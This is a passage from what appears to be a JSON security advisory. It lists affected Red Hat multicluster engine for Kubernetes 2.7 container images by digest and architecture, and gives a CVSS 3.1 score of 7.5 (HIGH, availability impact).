"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
